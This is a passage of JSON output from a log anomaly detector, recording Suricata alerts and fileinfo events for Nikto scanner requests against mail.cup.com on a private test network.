"\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":921236109171523,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 921236109171523, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.171725+0000\",\"flow_id\":921236109171523,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.173460 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46788 -> 192.168.10.154:80", "/parser/model/time": 1583349514.17346, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46788, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.173460 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46788 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.c", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.173752+0000\",\"flow_id\":1561375214838397,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.173752, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1561375214838397,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.c\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", 
"/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.c\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.c", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.c", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46788, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1561375214838397,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1561375214838397, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.173752+0000\",\"flow_id\":1561375214838397,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.175341 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46790 -> 192.168.10.154:80", "/parser/model/time": 1583349514.175341, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46790, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.175341 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46790 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.2", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.175637+0000\",\"flow_id\":1984927709702721,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.175637, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":1984927709702721,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.2\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.2\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.2", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.2", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46790, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1984927709702721,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1984927709702721, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": 
[ "{\"timestamp\":\"2020-03-04T19:18:34.175637+0000\",\"flow_id\":1984927709702721,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.178599 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46792 -> 192.168.10.154:80", "/parser/model/time": 1583349514.178599, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46792, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.178599 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46792 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.jsa", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.178847+0000\",\"flow_id\":279331771953661,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.178847, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":279331771953661,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.jsa\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.jsa\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.jsa", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.jsa", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
